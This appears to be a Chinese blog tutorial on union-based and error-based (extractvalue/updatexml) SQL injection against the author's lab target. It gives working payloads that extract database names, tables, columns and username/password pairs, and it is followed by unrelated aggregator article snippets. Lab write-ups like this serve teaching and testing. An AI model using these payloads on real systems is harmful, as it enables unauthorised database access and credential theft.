qwsn
qwsn

2.sql注入——联合查询/报错注入

Example4:

第一种方法:联合查询暴库

1.访问靶机: 发现URL栏像注入点
①上图:
2.sql注入——联合查询/报错注入_第1张图片
②:分析

发现一:如上图所示,访问我的靶机后,出现了两个字段,分别为id和name。(字段也就是列)
发现二:URL栏里面,有传参的形式出现(?/req=username='hacker',也就是这个 参数)
注意:%3d为等于号=
注意:%20为空格
注意:%27为单引号

//以上,可以确认为GET型注入(也就是从URL栏输入的)

2.开始试探一下确认注入点
①如何试探呢?
我们一般在拿到一个注入点后,就输入一个单引号' ,尝试是否会有报错,从而得到返回的sql查询语句
②那么为什么返回的报错语句,就是sql查询语句呢?
因为,正常访问的时候,都是通过传递参数给一条查询语句,这条语句在传到sql服务器,运行该语句命令,调取相关的内容,最后回显给浏览器
③好了,上图:
2.sql注入——联合查询/报错注入_第2张图片
④分析:
发现一:回显了报错内容,并且为 select * from users where username='hacker' '

⑤尝试 and 1=1
2.sql注入——联合查询/报错注入_第3张图片
⑥再次尝试and 1=2
2.sql注入——联合查询/报错注入_第4张图片
//以上,可以确认无过滤,而且可以直接注入

3.使用order by猜解字段数,也就是列数,毕竟联合查询必须要列数相同。
① 好了,开始二分法猜解法。(也就是一半一半的分,直到正确回显的临界值)
输入:order by 10
报错
2.sql注入——联合查询/报错注入_第5张图片
输入:order by 5
报错
2.sql注入——联合查询/报错注入_第6张图片
输入:order by 3
回显正常
2.sql注入——联合查询/报错注入_第7张图片
输入:order by 4
报错
2.sql注入——联合查询/报错注入_第8张图片

//以上,确认有三列,也就是三个字段

4.使用联合查询,确认哪些字段会显示,以及显示的顺序
①输入:union select 1,2,3
如图所示,显示2个字段的相应内容,并且回显顺序是自左向右
2.sql注入——联合查询/报错注入_第9张图片

//好多人,可能会疑惑为什么要输入1,2呢?
实际上,这个1,2,3只是一个代数,标志一下从哪里开始显示第一位,第二位,第三位相应位置的内容
//好多没有mysql基础的人,会疑惑为什么union select  1,2,3 什么意义?
好了,上源码分析吧:`select *  from users where username='hacker'  union select  1,2,3`
①咳咳咳,这条语句的select *  from users 其实就是在表users内查询所有内容,我们通过order by猜解有三个字段(也就是三个列),
②where username='hacker'  也就是,匹配到username字段值为hacker时候,回显该条内容
③union select  1,2,3,其实就是在users表的三个列的基础上,加上一横排的1,2,3

比如下图:

2.sql注入——联合查询/报错注入_第10张图片
//以上判断了位置1和位置2的查询,会回显,并且显示顺序是自左向右(注意不要把位置3忘记了)
②继续联合查询,把1和2的位置替换为函数等等,获取信息。

获取数据库名和版本信息:union select database(),version(),3

2.sql注入——联合查询/报错注入_第11张图片
获取当前路径和当前用户信息:union select @@basedir,user(),3
2.sql注入——联合查询/报错注入_第12张图片
获取库里的表: union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()

2.sql注入——联合查询/报错注入_第13张图片
获取表里的字段(也就是列):union select (column_name),2,3 from information_schema.columns where table_name='users'
2.sql注入——联合查询/报错注入_第14张图片
获取字段的信息:union select username,password,3 from users
2.sql注入——联合查询/报错注入_第15张图片

第二种方法:利用extractvalue()函数报错暴库

1.暴表:and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e))

如下图所示:表名为users,

①~就是0x7e
②limit  0,1   意思是从第一行,开始读第一个

在这里插入图片描述
2.暴第一个字段:and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e))
如下图所示:第一个字段(也就是第一个列)是id
在这里插入图片描述
3.暴第二个字段:and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e))
2.sql注入——联合查询/报错注入_第16张图片
4.暴第三个字段:and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e))
2.sql注入——联合查询/报错注入_第17张图片
//可以继续爆字段,但是我们这里暴除了username和password,查看一下内容吧

5.开始暴第一个用户名+密码: and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from users limit 0,1),0x7e))
在这里插入图片描述
6.开始暴第二个用户名+密码: and extractvalue(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 1,1),0x7e))

2.sql注入——联合查询/报错注入_第18张图片
//789继续暴出用户名和密码,如上,简单的复现了报错注入的过程

第三种方法:利用updatexml()函数报错暴库:

注入过程如下:
and  updatexml(1,concat(0x7e,(select @@version),0x7e),1)
and updatexml(1,concat(0x7e,(select user()),0x7e),1)
and  updatexml(1,concat(0x7e,(select database()),0x7e),1)
and  updatexml(1,concat(0x7e,(select distinct concat(0x7e,(select schema_name),0x7e) from user limit 0,1),0x7e),1)

//以下的语句同一二方法差不多

你可能感兴趣的:(Pentest,II)

  • Windows Server 2025 使用 IIS 搭建 ASP.NET 3.5 网站 少湖说 编程实践asp.netwindows
    开启远程桌面参考文章Windowsserver开启远程桌面教程打开服务管理器。ECS配置安全组,开启3389Telnet验证网络联通性telnetx.x.x.x338安装WindowsApp,登录验证安装ASP.NET3.51.参考文章WindowsServer2012安装.NETFramework3.5和WindowsServer2012上安装.NETFramework3.5打开服务器管理器,选
  • TCP与UDP 就很对 tcp/ipudp单片机
    TCP与UDPudpudpudp_ser.cudp_cli.cudp_cpudp_cp_serudp_cp_cliudp_chatudp_chat_serudp_chat_clitcptcptcp_sertcp_clibin_tcp_protocolbin_tcp_protocol_serbin_tcp_protocol_clihttp_weamultiioblockioblock_fifo_re
  • DAY33 贪心算法Ⅱ Useee 贪心算法算法
    122.买卖股票的最佳时机II-力扣(LeetCode)想到把整体利润分解为每天的利润,就豁然开朗了。classSolution{public:intmaxProfit(vector&prices){intresult=0;for(inti=1;i&nums){intcover=0;if(nums.size()==1)returntrue;for(inti=0;i=nums.size()-1)re
  • 强化学习中策略网络模型设计与优化技巧 数字扫地僧 计算机视觉深度学习
    I.引言强化学习(ReinforcementLearning,RL)是一种通过与环境交互,学习如何采取行动以最大化累积奖励的机器学习方法。策略网络(PolicyNetwork)是强化学习中一种重要的模型,它直接输出动作的概率分布或具体的动作。本篇博客将深入探讨策略网络的设计原则、优化技巧,并结合具体实例展示其应用。II.策略网络的基本概念A.策略网络的定义策略网络是一种神经网络,它接受当前状态作为
  • unique_ptr 在异常安全方面怎样? unique-ptr
    std::unique_ptr在异常安全方面表现出色,主要得益于其基于RAII(ResourceAcquisitionIsInitialization,资源获取即初始化)的设计理念。以下是它在异常安全方面的具体表现和优势:自动资源管理std::unique_ptr在构造时接管资源,并在析构时自动释放资源。这意味着即使在异常抛出时,只要std::unique_ptr的析构函数被调用,它所管理的资源就
  • 线代往事(1.2)为什么说如果AB=I,则BA=I? duoyasong5907 数学(vip栏目)线性代数
    参考mathstackexchange的回答。对于这句话:第一句话,首先由于III里的每个列向量都相互正交,所以I的值域是n维。而由于A
  • 【视频】m3u8相关操作 郭老二 视频音视频
    1、视频文件转m3u81.1常用命令1)默认只保留5个ts文件ffmpeg-iinput.mp4-start_number0-hls_time10-hls_list_size0-fhlsstream1.m3u82)去掉音频-an,保留全部ts文件ffmpeg-iinput.mp4-vfscale=640:480-an-start_number0-hls_time10-hls_list_size0-
  • 静态html 500错误,HTTP-500错误 金门走狗 静态html500错误
    http500内部服务器(HTTP-InternalServerError)错误说明IIS服务器无法解析ASP代码,访问一个静态页面试试是否也出现这个问题,如果访问静态页面没问题,那就要分以下几种情况来分析了:①你是否改变过计算机名称。②站点所在的文件目录是否自定义了安全属性。③安装了域控制器后是否调整了域策略。如果是其中的一种情况,请一一将改变的参数设置回来看是否解决问题。如果静态空间也无法访问
  • 深入解析Intel HEX文件格式 boringhex.top MCU嵌入式
    IntelHEX文件格式是一种用于表示二进制数据的ASCII文本格式,广泛应用于嵌入式系统的固件存储和传输。1.IntelHEX文件格式简介IntelHEX文件格式是一种将二进制数据转换为ASCII文本的格式,适用于8位、16位和32位微处理器。它的主要优点是可以将二进制数据存储在非二进制介质(如纸带、穿孔卡片)上,并且可以通过CRT终端或行式打印机显示。ASCII表示:每个字节的二进制值被转换为
  • 第十五届蓝桥杯省赛PythonB组B题【数字串个数】题解(AC) 信奥郭老师 蓝桥杯职场和发展
    设n=10000n=10000n=10000。法一枚举333的个数以及777的个数,假设333的个数为iii,777的个数为jjj,那么非3,73,73,7的个数即为n−i−jn-i-jn−i−j。在长度为nnn的字符串中选取iii的方案数为CniC^i_nCni,在剩余n−in-in−i个位置选取jjj个的方案数为Cn−ijC^j_{n-i}Cn−ij,剩余位置个数为n−i−jn-i-jn−i−
  • 程序员学商务英语之Don‘t jinx it、l have a half mind to do sth、Don‘t change the subject、Quality over quantity.. 李匠2024 英文
    1463-Don'tjinxit.-别鸟鸦嘴A:Whatifitrainstheweekend?Youknow,theweather'sbeenchangeablethesedays!如果这个周末下雨怎么办?你知道,这些天的天气变化无常!B:Don'tiinxit.i'vespentalotoftimepreparingforthiscamping.lhopeitstaysfineforthewe
  • 基于ThinkPHP6用户登录逻辑,结合FastAPI框架实现用户登录系统的全流程解析 Wiktok pythonfastapi
    基于ThinkPHP6用户登录逻辑,结合FastAPI框架实现用户登录系统的全流程解析,涵盖路由配置、数据验证、JWT令牌生成与鉴权、中间件依赖等核心环节:1.路由配置与请求处理路由定义:使用APIRouter组织用户认证相关接口(注册、登录),并通过app.include_router()集成到主应用。例如:#routers/auth.pyfromfastapiimportAPIRouterro
  • FastAPI Web框架 [1.9] carefree798 FastAPIpython
    表单数据fromfastapiimportFastAPI,Form#导入Form#表单数据#接收的不是JSON,而是表单字段时,要使用Formapp=FastAPI()@app.post("/login/")asyncdeflogin(username:str=Form(...),password:str=Form(...)#定义Form参数):return{"username":username
  • Modbus最全最简单讲解 道传科技上位机 网络
    一、什么是ModbusModbus是一种串行通信协议,最初由Modicon公司(现为施耐德电气的一部分)在1979年为使用其PLC(可编程逻辑控制器)而开发。Modbus已成为工业领域内广泛使用的一种通信协议,特别是对于监控和控制系统。Modbus协议支持多种通信方式,包括RTU(RemoteTerminalUnit,远程终端单元模式)、TCP/IP和ASCII(美国标准信息交换码)等。备注:C#
  • 3.无重复字符的最长字串(滑动窗口+哈希)C语言 Re_draw_debubu 哈希算法算法c语言滑动窗口
    代码思路1.滑动窗口法使用滑动窗口法,通过维护一个窗口(由start_index和end定义),动态调整窗口的大小,确保窗口内的字符没有重复。2.哈希表记录字符位置使用一个数组hash_map[128]来记录每个字符最后一次出现的位置。数组大小为128,因为ASCII字符的范围是0到127。hash_map[c]表示字符c最后一次出现的位置。3.滑动窗口的维护start_index表示当前窗口的起
  • 计算机组成与接口16 落——枫 单片机嵌入式硬件
    1.0的表示方法唯一的有补码,移码,ASCII码2.可以多次编程的只读存储器是EPROM,掩膜式ROM3.8259A芯片可设置成脉冲边沿触发方式;全嵌套方式;自动中断结束方式;特殊屏蔽方式4.计算机系统中的总线按层次可以分为板级总线;系统总线;片内总线5.可以或者曾经用作打印机接口的有:RS-232接口;Centronics接口;USB接口6.虚拟存储器对应的地址也叫逻辑地址,虚拟存储器比主存储器
  • 122. 买卖股票的最佳时机 II 请向我看齐 LeetCode算法
    题目分析LeetCode第122题是“买卖股票的最佳时机II”。题目描述为:给定一个数组prices,其中prices[i]是一支给定股票第i天的价格。设计一个算法来计算你所能获取的最大利润。你可以尽可能地完成更多的交易(多次买卖一支股票)。模式识别本题属于动态规划或者贪心算法的范畴。由于可以进行多次交易,且没有交易次数限制,所以可以通过比较相邻两天的价格,只要后一天价格比前一天高,就进行一次交易
  • 国产Cursor来了?字节跳动出品AI编程工具——Trae使用全解析 码云逸栈 AI编程
    Trae是什么?Trae是字节跳动最近发布的一款AIIDE,对标Cursor、Windsurf、Copilot这类AI编程工具。它是国产工具,在语言和易用性上更符合国人习惯,且现阶段完全免费!Trae提供智能问答、代码自动补全以及基于Agent的AI自动编程能力,帮助开发者在项目开发中与AI灵活协作,大幅提升开发效率。想深入了解可查看官网文档:docs.trae.ai/docs/what-i安装下
  • C++多线程 苜柠 C++c++
    线程:async和thread锁:C++11中的std::atomic和std::mutex推荐文章:C++11多线程(std::thread)详解_c++11线程使用-CSDN博客c++标准库多线程-云山漫卷-博客园std::lock_guard是一个RAII风格的简单的锁管理器,它在构造时自动加锁,在析构时自动解锁。#include#include#include#includestd::mu
  • 代码随想录算法训练营第八天| 344 反转字符串、541 反转字符串II Anjoubecoding 算法数据结构c++c语言leetcode
    这两天开的是字符串专题,我准备在做题的时候用C++做一遍,再用C做一遍,因为一直刷leetcode用的都是C++,导致C的基础太薄弱了,之后工作中有可能用到C,相当于再复习复习一、Leetcode344反转字符串题目链接:Leetcode344反转字符串这道题很简单,这才是真正的简单题voidreverseString(char*s,intsSize){intleft=0,right=sSize-
  • 安全基线-rm命令防护 晓夜残歌 安全chrome前端运维ubuntu服务器
    限制rm命令使用的多层级解决方案方案1:基础防护(个人/小型团队)1.1别名替换法#在~/.bashrc或全局/etc/bash.bashrc中添加aliasrm='echo"Usetrash-cliinstead.Installvia:sudoapt-getinstalltrash-cli"'aliasrm='trash-put'#安装后替换为实际命令优点:简单易行,防止误删缺点:可通过/bin
  • SATA(Serial Advanced Technology Attachment)详解 美好的事情总会发生 高速接口嵌入式硬件硬件工程智能硬件
    一、SATA的定义与核心特性SATA(串行高级技术附件)是一种用于连接存储设备(如硬盘、固态硬盘、光驱)的高速串行接口标准,取代了早期的PATA(并行ATA)。其核心特性包括:高速传输:支持最高6Gbps(SATAIII)的带宽。点对点连接:每个设备独立连接,避免总线争用。热插拔支持(需AHCI模式):允许在系统运行时插拔设备。低电压差分信号(LVDS):减少电磁干扰(EMI),提升信号完整性。二
  • Linux内核srio驱动,Zynq—Linux移植学习笔记(十四):RapidIO驱动开发 weixin_39942572 Linux内核srio驱动
    #defineDRIVER_NAME"xiic-rio"#defineSRIO_ZYNQ_BASEADDR0x40000000#defineSRIO_ZYNQ_NODE_BASEADDR0x10100#defineSRIO_ZYNQ_MAX_HOPCOUNT13structxiic_rio{structmutexlock;u8*data;};/*Weneedglobalvarriableforma
  • 强化学习中的深度卷积神经网络设计与应用实例 数字扫地僧 计算机视觉cnn人工智能神经网络
    I.引言强化学习(ReinforcementLearning,RL)是机器学习的一个重要分支,通过与环境的交互来学习最优策略。深度学习,特别是深度卷积神经网络(DeepConvolutionalNeuralNetworks,DCNNs)的引入,为强化学习在处理高维度数据方面提供了强大工具。本文将探讨强化学习中深度卷积神经网络的设计原则及其在不同应用场景中的实例。II.深度卷积神经网络在强化学习中的
  • 2024年最全Python二级考试试题汇总(史上最全) 2401_84584831 程序员python开发语言算法
    C‘1,2,3,4,5,’D1,2,3,4,5,正确答案:D以下程序的输出结果是:a=30b=1ifa>=10:a=20elifa>=20:a=30elifa>=30:b=aelse:b=0print(‘a={},b={}’.format(a,b))Aa=30,b=1Ba=30,b=30Ca=20,b=20Da=20,b=1正确答案:D以下程序的输出结果是:s=‘’try:foriinrange(
  • 剑指 Offer II 113. 课程顺序(中等 图 bfs 拓扑排序 数组 哈希表) 风雨中de宁静 图搜索算法
    剑指OfferII113.课程顺序现在总共有numCourses门课需要选,记为0到numCourses-1。给定一个数组prerequisites,它的每一个元素prerequisites[i]表示两门课程之间的先修顺序。例如prerequisites[i]=[ai,bi]表示想要学习课程ai,需要先完成课程bi。请根据给出的总课程数numCourses和表示先修顺序的prerequisites
  • 1252. 奇数值单元格的数目 / 剑指 Offer II 113. 课程顺序 彼淇梁 力扣刷题记录算法leetcodejava刷题记录
    1252.奇数值单元格的数目【简单题】【每日一题】思路:【模拟】定义行数组rows和列数组cols,用来记录当前行的+1次数和当前列的+1次数,遍历indices数组用来给rows和cols赋值。定义奇数值单元格数目为ans,初值为0。那么遍历矩阵每个位置,如果当前行和当前列的+1次数和是奇数,则ans+1代码:classSolution{publicintoddCells(intm,intn,i
  • Leetcode 剑指 Offer II 032. 有效的变位词 我不是程序员~~~~ C&C++leetcode算法职场和发展
    给定两个字符串s和t,编写一个函数来判断它们是不是一组变位词(字母异位词)。注意:若s和t中每个字符出现的次数都相同且字符顺序不完全相同,则称s和t互为变位词(字母异位词)。示例1:输入:s="anagram",t="nagaram"输出:true示例2:输入:
  • 剑指 Offer II 061. 和最小的 k 个数对 炫云云 大数据算法和数据结构leetcode算法python
    剑指OfferII061.和最小的k个数对给定两个以升序排列的整数数组nums1和nums2,以及一个整数k。定义一对值(u,v),其中第一个元素来自nums1,第二个元素来自nums2。请找到和最小的k个数对(u1,v1),(u2,v2)…(uk,vk)。示例1:输入:nums1=[1,7,11],nums2=[2,4,6],k=3输出:[1,2],[1,4],[1,6]解释:返回序列中的前3对
  • LeetCode 热题 100_跳跃游戏 II(79_45_中等_C++)(贪心算法) Dream it possible! LeetCode热题100leetcodec++贪心算法算法
    LeetCode热题100_跳跃游戏II(79_45)题目描述:输入输出样例:题解:解题思路:思路一(贪心选择):代码实现代码实现(思路一(贪心算法)):以思路一为例进行调试题目描述:给定一个长度为n的0索引整数数组nums。初始位置为nums[0]。每个元素nums[i]表示从索引i向后跳转的最大长度。换句话说,如果你在nums[i]处,你可以跳转到任意nums[i+j]处:0&nums){in
  • 312个免费高速HTTP代理IP(能隐藏自己真实IP地址) yangshangchuan 高速免费superwordHTTP代理
        124.88.67.20:843 190.36.223.93:8080 117.147.221.38:8123 122.228.92.103:3128 183.247.211.159:8123 124.88.67.35:81 112.18.51.167:8123 218.28.96.39:3128 49.94.160.198:3128 183.20
  • pull解析和json编码 百合不是茶 androidpull解析json
    n.json文件: [{name:java,lan:c++,age:17},{name:android,lan:java,age:8}]   pull.xml文件 <?xml version="1.0" encoding="utf-8"?> <stu>     <name>java
  • [能源与矿产]石油与地球生态系统 comsci 能源
          按照苏联的科学界的说法,石油并非是远古的生物残骸的演变产物,而是一种可以由某些特殊地质结构和物理条件生产出来的东西,也就是说,石油是可以自增长的....       那么我们做一个猜想: 石油好像是地球的体液,我们地球具有自动产生石油的某种机制,只要我们不过量开采石油,并保护好
  • 类与对象浅谈 沐刃青蛟 java基础
           类,字面理解,便是同一种事物的总称,比如人类,是对世界上所有人的一个总称。而对象,便是类的具体化,实例化,是一个具体事物,比如张飞这个人,就是人类的一个对象。但要注意的是:张飞这个人是对象,而不是张飞,张飞只是他这个人的名字,是他的属性而已。而一个类中包含了属性和方法这两兄弟,他们分别用来描述对象的行为和性质(感觉应该是
  • 新站开始被收录后,我们应该做什么? IT独行者 PHPseo
    新站开始被收录后,我们应该做什么?         百度终于开始收录自己的网站了,作为站长,你是不是觉得那一刻很有成就感呢,同时,你是不是又很茫然,不知道下一步该做什么了?至少我当初就是这样,在这里和大家一份分享一下新站收录后,我们要做哪些工作。       至于如何让百度快速收录自己的网站,可以参考我之前的帖子《新站让百
  • oracle 连接碰到的问题 文强chu oracle
    Unable to find a java Virtual Machine--安装64位版Oracle11gR2后无法启动SQLDeveloper的解决方案 作者:草根IT网 来源:未知 人气:813标签: 导读:安装64位版Oracle11gR2后发现启动SQLDeveloper时弹出配置java.exe的路径,找到Oracle自带java.exe后产生的路径“C:\app\用户名\prod
  • Swing中按ctrl键同时移动鼠标拖动组件(类中多借口共享同一数据) 小桔子 java继承swing接口监听
            都知道java中类只能单继承,但可以实现多个接口,但我发现实现多个接口之后,多个接口却不能共享同一个数据,应用开发中想实现:当用户按着ctrl键时,可以用鼠标点击拖动组件,比如说文本框。 编写一个监听实现KeyListener,NouseListener,MouseMotionListener三个接口,重写方法。定义一个全局变量boolea
  • linux常用的命令 aichenglong linux常用命令
    1 startx切换到图形化界面 2 man命令:查看帮助信息 man 需要查看的命令,man命令提供了大量的帮助信息,一般可以分成4个部分 name:对命令的简单说明 synopsis:命令的使用格式说明 description:命令的详细说明信息 options:命令的各项说明 3 date:显示时间 语法:date [OPTION]... [+FORMAT]
  • eclipse内存优化 AILIKES javaeclipsejvmjdk
    一 基本说明      在JVM中,总体上分2块内存区,默认空余堆内存小于 40%时,JVM就会增大堆直到-Xmx的最大限制;空余堆内存大于70%时,JVM会减少堆直到-Xms的最小限制。     1)堆内存(Heap memory):堆是运行时数据区域,所有类实例和数组的内存均从此处分配,是Java代码可及的内存,是留给开发人
  • 关键字的使用探讨 百合不是茶 关键字
    //关键字的使用探讨/*访问关键词private 只能在本类中访问public 只能在本工程中访问protected 只能在包中和子类中访问默认的 只能在包中访问*//*final   类 方法 变量 final 类 不能被继承 final 方法 不能被子类覆盖,但可以继承 final 变量 只能有一次赋值,赋值后不能改变 final 不能用来修饰构造方法*///this()
  • JS中定义对象的几种方式 bijian1013 js
        1. 基于已有对象扩充其对象和方法(只适合于临时的生成一个对象): <html> <head> <title>基于已有对象扩充其对象和方法(只适合于临时的生成一个对象)</title> </head> <script> var obj = new Object();
  • 表驱动法实例 bijian1013 java表驱动法TDD
    获得月的天数是典型的直接访问驱动表方式的实例,下面我们来展示一下: MonthDaysTest.java package com.study.test; import org.junit.Assert; import org.junit.Test; import com.study.MonthDays; public class MonthDaysTest { @T
  • LInux启停重启常用服务器的脚本 bit1129 linux
    启动,停止和重启常用服务器的Bash脚本,对于每个服务器,需要根据实际的安装路径做相应的修改   #! /bin/bash Servers=(Apache2, Nginx, Resin, Tomcat, Couchbase, SVN, ActiveMQ, Mongo); Ops=(Start, Stop, Restart); currentDir=$(pwd); echo
  • 【HBase六】REST操作HBase bit1129 hbase
    HBase提供了REST风格的服务方便查看HBase集群的信息,以及执行增删改查操作   1. 启动和停止HBase REST 服务 1.1 启动REST服务 前台启动(默认端口号8080) [hadoop@hadoop bin]$ ./hbase rest start   后台启动 hbase-daemon.sh start rest   启动时指定
  • 大话zabbix 3.0设计假设 ronin47
    What’s new in Zabbix 2.0? 去年开始使用Zabbix的时候,是1.8.X的版本,今年Zabbix已经跨入了2.0的时代。看了2.0的release notes,和performance相关的有下面几个:          :: Performance improvements::Trigger related da
  • http错误码大全 byalias http协议javaweb
    响应码由三位十进制数字组成,它们出现在由HTTP服务器发送的响应的第一行。 响应码分五种类型,由它们的第一位数字表示: 1)1xx:信息,请求收到,继续处理 2)2xx:成功,行为被成功地接受、理解和采纳 3)3xx:重定向,为了完成请求,必须进一步执行的动作 4)4xx:客户端错误,请求包含语法错误或者请求无法实现 5)5xx:服务器错误,服务器不能实现一种明显无效的请求
  • J2EE设计模式-Intercepting Filter bylijinnan java设计模式数据结构
    Intercepting Filter类似于职责链模式 有两种实现 其中一种是Filter之间没有联系,全部Filter都存放在FilterChain中,由FilterChain来有序或无序地把把所有Filter调用一遍。没有用到链表这种数据结构。示例如下: package com.ljn.filter.custom; import java.util.ArrayList;
  • 修改jboss端口 chicony jboss
    修改jboss端口   %JBOSS_HOME%\server\{服务实例名}\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml   中找到 <!-- The ports-default bindings are obtained by taking the base bindin
  • c++ 用类模版实现数组类 CrazyMizzz C++
    最近c++学到数组类,写了代码将他实现,基本具有vector类的功能 #include<iostream> #include<string> #include<cassert> using namespace std; template<class T> class Array { public: //构造函数
  • hadoop dfs.datanode.du.reserved 预留空间配置方法 daizj hadoop预留空间
    对于datanode配置预留空间的方法 为:在hdfs-site.xml添加如下配置  <property>     <name>dfs.datanode.du.reserved</name>     <value>10737418240</value>    
  • mysql远程访问的设置 dcj3sjt126com mysql防火墙
    第一步: 激活网络设置 你需要编辑mysql配置文件my.cnf. 通常状况,my.cnf放置于在以下目录: /etc/mysql/my.cnf (Debian linux) /etc/my.cnf (Red Hat Linux/Fedora Linux) /var/db/mysql/my.cnf (FreeBSD) 然后用vi编辑my.cnf,修改内容从以下行: [mysqld] 你所需要: 1
  • ios 使用特定的popToViewController返回到相应的Controller dcj3sjt126com controller
    1、取navigationCtroller中的Controllers NSArray * ctrlArray = self.navigationController.viewControllers; 2、取出后,执行, [self.navigationController popToViewController:[ctrlArray objectAtIndex:0] animated:YES
  • Linux正则表达式和通配符的区别 eksliang 正则表达式通配符和正则表达式的区别通配符
    转载请出自出处:http://eksliang.iteye.com/blog/1976579 首先得明白二者是截然不同的 通配符只能用在shell命令中,用来处理字符串的的匹配。 判断一个命令是否为bash shell(linux 默认的shell)的内置命令 type -t commad 返回结果含义 file  表示为外部命令 alias  表示该
  • Ubuntu Mysql Install and CONF gengzg Install
    http://www.navicat.com.cn/download/navicat-for-mysql Step1: 下载Navicat ,网址:http://www.navicat.com/en/download/download.html Step2:进入下载目录,解压压缩包:tar -zxvf navicat11_mysql_en.tar.gz
  • 批处理,删除文件bat huqiji windowsdos
    @echo off ::演示:删除指定路径下指定天数之前(以文件名中包含的日期字符串为准)的文件。 ::如果演示结果无误,把del前面的echo去掉,即可实现真正删除。 ::本例假设文件名中包含的日期字符串(比如:bak-2009-12-25.log) rem 指定待删除文件的存放路径 set SrcDir=C:/Test/BatHome rem 指定天数 set DaysAgo=1
  • 跨浏览器兼容的HTML5视频音频播放器 天梯梦 html5
    HTML5的video和audio标签是用来在网页中加入视频和音频的标签,在支持html5的浏览器中不需要预先加载Adobe Flash浏览器插件就能轻松快速的播放视频和音频文件。而html5media.js可以在不支持html5的浏览器上使video和audio标签生效。   How to enable <video> and <audio> tags in
  • Bundle自定义数据传递 hm4123660 androidSerializable自定义数据传递BundleParcelable
          我们都知道Bundle可能过put****()方法添加各种基本类型的数据,Intent也可以通过putExtras(Bundle)将数据添加进去,然后通过startActivity()跳到下一下Activity的时候就把数据也传到下一个Activity了。如传递一个字符串到下一个Activity   把数据放到Intent
  • C#:异步编程和线程的使用(.NET 4.5 ) powertoolsteam .net线程C#异步编程
    异步编程和线程处理是并发或并行编程非常重要的功能特征。为了实现异步编程,可使用线程也可以不用。将异步与线程同时讲,将有助于我们更好的理解它们的特征。 本文中涉及关键知识点 1. 异步编程 2. 线程的使用 3. 基于任务的异步模式 4. 并行编程 5. 总结 异步编程 什么是异步操作?异步操作是指某些操作能够独立运行,不依赖主流程或主其他处理流程。通常情况下,C#程序
  • spark 查看 job history 日志 Stark_Summer 日志sparkhistoryjob
    SPARK_HOME/conf 下: spark-defaults.conf 增加如下内容 spark.eventLog.enabled true spark.eventLog.dir hdfs://master:8020/var/log/spark spark.eventLog.compress true spark-env.sh 增加如下内容 export SP
  • SSH框架搭建 wangxiukai2015eye springHibernatestruts
    MyEclipse搭建SSH框架 Struts Spring Hibernate 1、new一个web project。 2、右键项目,为项目添加Struts支持。    选择Struts2 Core Libraries -<MyEclipes-Library>      点击Finish。src目录下多了struts
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他